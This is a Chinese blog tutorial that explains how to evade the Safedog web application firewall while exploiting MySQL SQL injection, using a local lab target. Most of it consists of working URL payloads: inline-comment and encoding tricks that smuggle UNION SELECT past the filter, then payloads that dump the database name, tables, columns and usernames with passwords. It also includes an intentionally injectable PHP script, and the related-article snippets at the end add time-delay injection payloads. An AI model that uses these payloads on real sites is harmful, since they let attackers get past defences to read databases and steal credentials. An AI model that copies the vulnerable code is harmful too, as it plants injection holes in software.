mysql延迟注入br_(原创)安全狗SQL注入绕过思路[sql注入waf绕过][sql注入bypass]

最新推荐文章于 2023-08-23 21:05:01 发布
最新推荐文章于 2023-08-23 21:05:01 发布
阅读量257 收藏
点赞数
文章标签: mysql延迟注入br
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39743357/article/details/113455525
版权
本文介绍了如何通过MySQL延迟注入技术,利用四重注释、特殊字符编码和注释符号混淆,成功绕过安全狗的SQL注入防护。详细讲解了绕过and 1=1、union+select、爆库、爆字段和读取内容的过程。
摘要由CSDN通过智能技术生成

2017/09/03_Bypass_safedog_Sql注入

prat 1

本文大致内容

+ 思路以及想法

- 四重注释绕过safedog

+ 实战绕过

- 绕过and 1=1

- 绕过union+select

- 爆表

- 爆字段

- 读内容

prat 2

测试代码

$link = mysqli_connect('localhost','root','root','security');

$sql = "select * from users where id=".$_GET['id'];

$result = mysqli_query($link,$sql);

if($rows = mysqli_fetch_array($result)){

echo $rows['id'];

echo '
';

echo $rows['username'];

echo '
';

echo $rows['password'];

echo '
';

}

mysqli_close($link);

?>

prat 3

绕过 and 1=1

Url:url:http://192.168.1.107/sql.php?id=1 and 1=1

e742c420f40b9aca4af128e275b41e54.png

发现惨遭拦截,首先让我们来看一下他拦截什么,不拦截什么。

and 不拦截

and 1 拦截

and 1 = 拦截

and 1 = 1 拦截

由此可见,只要and后面出现数字或者成立一个等式那么他就拦截,那我们用/**/注释来绕过一下看看

/**/aNd/**//**/'a'/**/ = /**/'a'/**/

注释包含把1=1替换成‘a’=‘a’就得到了url:

342eba0a646c3a32bd37dba8e3209f4e.png

返回不正常(等式不等)并且发现狗就不拦截了,可见注释方法还是如此任性

Order by

7d860485b840a82f2cb7a40ff83b537d.png

06e64d4b460d0b68b5f00d19fd8523a5.png

我发现我装的狗是不会拦截order by的,所以也就没绕,有需求在说。

字段为3,接下来爆库,当前用户。

绕过union+select

url:http://192.168.1.107/sql.php?id=1 UNION SELECT 1,2,3

66f4edba2dedbf5472ec44aabd06d322.png

同样,先看一下他拦截什么。

union 不拦截

select 不拦截

union select 拦截

很明显,我们只需要在union与select之间处理一下就可以了。

首先使用/!50000/注释包含/!/然后使用/**/与/–*/打乱一下结构,在稍微进行一下编码处理就可以了

url:http://192.168.1.107/sql.php?id=-1 /*!50000/*--*//**//*!%55nion/*--*/*//**//*!(%53elect 1,2,3)/*--*/*/-- -

a83d1f5dcafb70e7af1b06b5ccd7d727.png

可以发现,已经正常显示数字,并且狗没有拦截。 什么?你说没看懂?那么看下图

c70c4e2cab4d48704112d020797a76f8.png

拆分一下就发现其实很好理解,使用()把select的内容包起来。

爆库

http://192.168.1.107/sql.php?id=-1 /*!50000/*--*//**//*!%55nion/*--*/*//**//*!(%53elect 1,user(),database())/*--*/*/-- -

f5ea06799a3b14ca09869e104a6c1308.png

发现又特么拦截了,很明显,他会拦截一些常用系统函数(还有许多就不列出来了,列出常用的)

1. version()——MySQL 版本

2. user()——数据库用户名

3. database()——数据库名

4. @@datadir——数据库路径

5. @@version_compile_os——操作系统版本

既然已经知道了拦截什么,那么绕他还难么,掏出/**/注释大法。

在user(),database()之间处理以下。

那么就成为了

user/**/(/**/)

database/**/(/**/)

完整url:

http://192.168.1.107/sql.php?id=-1/*!50000/*--*//**//*!%55nion/*--*/*//**//*!(%53elect 1,user/**/(/**/),database/**/(/**/))/*--*/*/--

-

ebada9db768cbb07b97173585414cf2e.png

正常爆出数据库跟当前用户

爆表

发现我本身的狗可能有点问题,他不拦截from,于是也没有绕,还是那句话,需要啥,绕啥。

url:http://192.168.1.107/sql.php?id=-1

/*!50000/*--*//**//*!%55nion/*--*/*//**//*!(%53elect database/**/(/**/),group_concat(concat_ws(0x23,table_name)),user/**/(/**/)

from information_schema.tables where table_schema='security')/*--*/*/ limit 0,1-- -

885254e25a4dc641b614c1a4a7b5cfcf.png

得到Table

emails

referers

uagents

Users

爆字段

url:http://192.168.1.107/sql.php?id=-1

/*!50000/*--*//**//*!%55nion/*--*/*//**//*!(%53elect database/**/(/**/),group_concat(concat_ws(0x23,column_name)),user/**/(/**/)

from information_schema.columns where table_name='users')/*--*/*/ limit 0,1-- -

dcdd6be13f2b8cb962edc48b422ffa1f.png

得到column

id

username

Password

读内容

url:http://192.168.1.107/sql.php?id=-1

/*!50000/*--*//**//*!%55nion/*--*/*//**//*!(%53elect database/**/(/**/),group_concat(concat_ws(0x23,username,password)),user/**/(/**/)

from users)/*--*/*/ limit 0,1-- -

faa6920f8779110db4eba8573fa8c075.png

Dump

Dumb#Dumb

weixin_39743357
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysqlwaf_SQL注入9种绕过WAF方法
weixin_30586417的博客
01-31 621
SQL注入9种绕过WAF方法0x01前言WAF区别于常规防火墙是因为WAF能够过滤特定Web应用程序的内容,而常规防火墙则充当服务器之间的防御门。通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止来自、(XSS)、和安全配置错误。0x02 WAF工作原理§检测异常协议:拒绝不符合HTTP标准的请求§增强型的输入验证:代理和服务器端验证,而不仅仅是客户端验证§白名单和黑名单§基于规则和异常...
mysql注入fuzz字典_sql注入fuzz bypass waf
weixin_30467861的博客
01-28 788
本帖最后由 xmidf 于 2018-7-11 10:16 编辑作者:whynot 转自:先知0x0 前言这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结。0x1 注入点检测一般的注入还是很好判断的,特别是基于报错,但有...
Mysql注入 -- 延时注入
weixin_41489908的博客
05-16 2849
生活不止眼前的苟且,还有房费、饭费、水电费。。。 ----网易云热评 一、常用函数 1、sleep(5):延时5秒 2、if(a,b,c):a为条件,正确返回b,否则返回c 二、实例测试 1、找到可以注入的payload,服务器反映5秒才有相应 http://192.168.139.129/sqli/Less-9/?id=1' and sleep(5) --+ 2、获取数据库长度,如果数据库名的长度等于8停留5秒 http://192.168.139.129/sqli/..
sql注入——mysql延时注入
Night_time的博客
05-06 4440
注入思路 1,判断是否存在注入点,注入点是字符型还是数值型 2,构建sleep延时注入语句,猜测当前数据库的库名的长度是几个字符 3,猜测数据库下的表名的长度是由多少个字符组成的 4,猜测字段名(列名) 5,猜测数据 使用延时注入的时机 用于,无法回现和无法显示错误页面的场景 使用if(length(注入语句)=N,sleep(5),1),改变N的值,如果条件成立,通过服务器的休...
第31篇:一系列操作使sqlmap识别一个奇葩的延时注入点并绕waf的艰难过程
ABC_123的博客
11-19 968
Part1 前言在最近的一次渗透测试项目中,遇到了一个奇葩的SQL延时注入漏洞,sqlmap无法识别出来。但是客户非让在测试环境跑出数据进行验证,否则不认可这个漏洞的危害性。编写一个多线程的延时注入脚本是很麻烦的,于是ABC_123经过了一系列操作,最终成功让sqlmap识别这个注入点并成功枚举出数据,相信也能给大家很多的启示。注:在读研那会儿,我曾经把sqlmap手册打印出来,从头到尾看了好...
mysql注入闭合_Mysql注入绕过安全狗
weixin_33980357的博客
01-19 219
Mysql注入绕过安全狗sql注入闭合检查sql注入的分类有很多种分法;可以分成数字型和字符型,区别在于是否需要完整闭合。本题中由于我经验不足,试了好久才想到就是简单的双引号加括号就可以闭合了,然后再注释掉后面的内容。单引号回显正常结果双引号错误回显这里其实可以简单分析一下,"1 是Get请求传递的参数值,后面的 ")是这里的闭合方式。双引号加括号 ")(" ,就把前后都闭合了。闭合结果接着就简单...
mysql注入的 反斜杠_SQL注入防御绕过——二次编码之干掉反斜杠
weixin_42588555的博客
01-26 1372
01 背景知识一、为什么要进行URL编码通常如果一样东西需要编码,说明这样东西并不适合传输。对于URL来说,编码主要是为了避免引发歧义与混乱。例如,URL参数字符串中使用key=value键值对这样的形式来传参,键值对之间以&符号分隔,如/?name=abc&pwd=123如果你的value字符串中包含了=或者&,那么势必会造成接收Url的服务器解析错误,因此必须将引起歧义...
第三篇:Bypass ngx_lua_waf SQL注入防御(多姿势)1
08-03
本文将探讨三种绕过ngx_lua_waf SQL注入防御的方法,旨在提高读者对安全防御机制的理解,并促进网络安全领域的进一步研究。 #### 0x01 环境搭建与测试准备 为了深入理解并验证绕过方法的有效性,首先需要搭建一个...
第08篇:Bypass ngx_lua_waf SQL注入防御(多姿势)1
08-03
### Bypass ngx_lua_waf SQL注入防御方法解析 #### 0x00 前言 ngx_lua_waf是一款基于ngx_lua的Web应用防火墙,以其高性能与轻量级著称。它内置了一系列针对常见攻击手段如SQL注入的防御规则。然而,在实际应用中,...
安全狗mysql_Fuzz绕过安全狗4.0实现SQL注入
weixin_42125192的博客
02-05 298
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
4.0.13 mysql 注入_Bypass安全狗4.0
weixin_29770217的博客
01-26 287
SQL注入Bypass安全狗4.0最近准备多搞搞实战,就准备从绕waf开始,第一位受害者就选安全狗4.0叭。源代码:check$agent = $_SERVER['HTTP_USER_AGENT'];include 'connection.php';function LoginCheck(){if (isset($_GET['username']) && isset($_GET['...
mysql特性绕过安全狗_SQL注入原理及绕过安全狗
weixin_36140403的博客
02-02 282
/...//!.../ 内联注释/*!50000select */(mysql版本大于50000执行)[ ] mysql中一些函数system_user()系统用户名user()用户名current_user()当前用户名session_user()连接数据库的用户名database() 数据库名version()MySql数据库版本load_file()MySql读取本地文件的函数@@datad...
mysql延迟注入是什么_mysql 延时注入思路
weixin_42292183的博客
01-19 329
转自先知社区https://xz.aliyun.com/t/2288在4月的pwnhub比赛中,我们遇到了一个比较神奇的问题,如果在注入中遇到需要延时注入的情况,但服务端过滤了我们一般使用的sleep和benchmark函数,这时候我们有没有办法使用别的方式来替代这两个函数造成延时呢?这里可以代码看看require 'conn.php';$id = $_GET['id'];if(preg_matc...
安全狗 mysql_Mysql下Union注入Bypass安全狗过程
weixin_31684041的博客
01-18 134
一次众测发现个注入,然后有安全狗就顺带看了下安全狗。先fuzz看看安全狗拦截什么关键词union select x,x 拦截尝试用union函数 union(select 1,2,3) 拦截union(%20select 1,2,3,4) 不拦截,注意select前面有个空格。之前出题的代码...懒得改了…中二。union(%20select%201,(select%20user%20from%2...
MySQL延时注入(3分钟搞懂盲注思路)
最新发布
yuan_boss的博客
08-23 1532
任务:sqli_labs第9关,通过延时注入,获取版本号。
mysql 延时 注入_MySQL时间盲注五种延时方法
weixin_39561168的博客
01-19 1727
延时注入函数五种:sleep(),benchmark(t,exp),笛卡尔积,GET_LOCK() RLIKE正则sleep()sleep(x)select sleep(5);benchmark() 重复执行某表达式benchmark(t,exp)select benchmark(count,expr),是重复执行count次expr表达式,使得处理时间很长,来产生延迟,比如select benc...
mysql 3.23 注入_安全狗SQL注入、上传绕过-2017-3-23
weixin_32871457的博客
01-27 74
作者是谁不清楚,看到群里分享出来的,所以转载到博客了。-----收集整理 by: www.nvhack.com 安全狗SQL注入绕过 测试文件,明显的字符型SQL 注入
sql注入-延时注入】sleep()、benchmark()函数 延时注入
07-10 7634
延时注入】结合if、case when 延时注入
MySQL延时盲注
一个普普通通的博客
03-01 1497
Mysql延时盲注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值